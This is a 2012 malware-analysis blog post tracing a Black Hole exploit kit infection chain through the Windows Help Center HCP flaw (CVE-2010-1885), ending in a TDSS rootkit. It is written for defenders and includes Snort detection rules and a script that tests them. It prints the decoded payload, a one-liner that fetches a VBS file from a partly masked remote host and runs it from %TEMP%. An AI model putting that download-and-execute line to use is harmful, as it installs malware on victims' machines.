Tuesday, January 17, 2012

JAVA/HCP/ Black Hole Exploit Kit malware analysis

By Christiaan Beek


A couple of weeks ago there was a good amount of commotion around the usage of Java and the Black Hole exploit kit to infect users. While I was in Abu Dhabi teaching class I remembered that two weeks ago we had a similar case where Java and URL-structures used by the Black Hole exploit kit were used, so I decided to write up a little post to help explain it.

The attack started with a targeted email to a certain department, containing a URL from which victims could download an "error report".

This email contained a ‘suspicious’ URL:


This URL points to a site which is empty and shows the message "page is loading…wait". In the source code of the page, the following URLs were discovered:

In this page there are 4 URLs which are accessed – all of them serve the same JavaScript file.

In the Java file, another URL is hidden:

This site was actually hosting several different pieces of malware:


Malware behavior

In an isolated lab environment, the following URL was executed to study its behavior:


The JAR file contained several instances of obfuscated code which made it slightly difficult to analyze. After the first part was decoded, the infection vector became clear:

The first part of the script (after eval) was obfuscated using decimal character codes. First I used Malzilla: I went to the "Misc Decoders" tab and pasted the script. After selecting the right area, I clicked the "decimal" option and the obfuscated piece was decoded:

Infection vector

In the first couple of lines the following can be detected: [hcp://services …. Helpctr.exe] – this indicates that the Microsoft Help and Support Center URL-escaping vulnerability is being used. In the fragment above, the escaping is done with multiple "%A" sequences. This vulnerability is documented as CVE-2010-1885.

Malware behavior continued

In the decoded part of the vulnerability the following became visible:

eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://advxxxxxxxxxx.com/content/hcp_vbs.php?f=166::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe)))

First it creates a VBS file (l.vbs) in the %TEMP% folder and initiates a GET request for another web resource through the XMLHTTP object. The web resource is another VBS file disguised as a PHP file:


The "hcp_vbs.php?f=" part of the URL is known to be part of the Black Hole Exploit Kit.

Blackhole Exploit Kit: "The Black Hole exploit kit is an unethical off-the-shelf Web application. The first instance - v.1.0.0 beta - has appeared on the black market and was advertised in August 2010 as a "System for network testing". As with most of the exploit kits, it is based on PHP and a MySQL backend. The payload of this kit usually targets Windows operating systems and an application installed on those systems, but depends on the criminals' end goal." (source: http://community.websense.com/blogs/)

After the l.vbs file is created it will be executed. The heavily obfuscated code was analyzed and the following interesting parts became visible:

This particular piece of the application checks which versions of Java, PDF reader and Flash are on the system. Another piece of code shows that the User-Agent string is read to determine which device or operating system the client uses:

This information is sent back to the Black Hole Kit gateway, and the available exploits for that combination are sent back to take over the machine, execute remote commands, etc.
In my lab, I used an unpatched version of Windows X and an outdated version of Shockwave Flash. Acrobat and Java were up to date.

Next, the delivery mechanism retrieved a variant of the TDSS rootkit.

Memory analysis

After infecting the lab machine, an acquisition of the memory was taken for analysis. Using several tools it became clear that traces of the malware had hooked themselves into the following (valid) Windows processes:
  • IExplorer
  • SVChost
By dumping the malicious parts of memory, I was able to compare them against our internal malware database and the website Virustotal.com. Only 7 out of 43 antivirus engines were capable of detecting this variant of TDSS/Alureon.


Check if your systems are patched for the HCP vulnerability:

Snort detection rules (source: Chris Wakelin)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f="; http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity; sid:2013077; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit"; flow:established,to_server; content:"/pch.php?f="; http_uri; pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2"; flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri; pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;
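To see how these rules behave on real request URIs, here is an added example (my own code, not part of the original post or of the Emerging Threats rule set) that reduces each of the three rules to the two conditions Snort evaluates for them, the content match on the URI and the anchored PCRE, and runs them over a handful of constructed URIs. One of the constructed URIs copies the query-string shape from the decoded payload above (f=166::60&d=0::0): the content match fires on it, but the PCRE of sid:2013549 requires plain digits around "&d=", so that rule would not alert on this particular sample. Reporting such content-only hits is a useful way to spot rules that need tuning.

```python
import re

# Constructed sample request URIs (not captures from the post). The fourth one
# mirrors the query-string shape seen in the decoded hcp_vbs payload above.
SAMPLE_URIS = [
    "/hcp_asx.php?f=17",
    "/pch.php?f=42",
    "/content/hcp_vbs.php?f=166&d=0",
    "/content/hcp_vbs.php?f=166::60&d=0::0",
    "/index.php?f=1",
]

# The three rules from the post, reduced to their URI content match and PCRE.
# Snort's /U modifier means "match against the normalized URI", which is what
# we feed in here; the regexes are copied verbatim from the rules.
RULES = [
    {"sid": 2013077, "content": "/hcp_asx.php?f=", "pcre": r"/hcp_asx\.php\?f=\d+$"},
    {"sid": 2013548, "content": "/pch.php?f=",     "pcre": r"/pch\.php\?f=\d+$"},
    {"sid": 2013549, "content": "/hcp_vbs.php?f=", "pcre": r"/hcp_vbs\.php\?f=\d+&d=\d+$"},
]


def evaluate_rule(rule, uri):
    """Return (content_hit, pcre_hit); Snort only alerts when both are true."""
    content_hit = rule["content"] in uri
    pcre_hit = re.search(rule["pcre"], uri) is not None
    return content_hit, pcre_hit


def match_uris(uris, rules=RULES):
    """Map each URI to the list of SIDs that would alert on it."""
    results = {}
    for uri in uris:
        results[uri] = [
            rule["sid"] for rule in rules if all(evaluate_rule(rule, uri))
        ]
    return results


def partial_matches(uris, rules=RULES):
    """(uri, sid) pairs where the content matched but the PCRE did not.

    These are the requests a rule "almost" caught: the fast-pattern string
    is present, but the stricter regex rejects the query string, so no alert
    is raised. Reviewing them is how you find rules that need loosening.
    """
    partial = []
    for uri in uris:
        for rule in rules:
            content_hit, pcre_hit = evaluate_rule(rule, uri)
            if content_hit and not pcre_hit:
                partial.append((uri, rule["sid"]))
    return partial


if __name__ == "__main__":
    for uri, sids in match_uris(SAMPLE_URIS).items():
        print(f"{uri!s:45} -> {sids or 'no alert'}")
    for uri, sid in partial_matches(SAMPLE_URIS):
        print(f"content-only hit (PCRE missed): sid {sid} on {uri}")
```

The script prints one line per URI with the SIDs that would alert, followed by any content-only hits. On the constructed input, the URI with the "::"-separated values produces a content-only hit for sid:2013549 and no alert, which is exactly the gap a detection engineer would want to confirm against their own traffic before relying on the rule.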

1 comment:

  1. Great post about security, thanks Christiaan for sharing it with us.
    Have a nice day.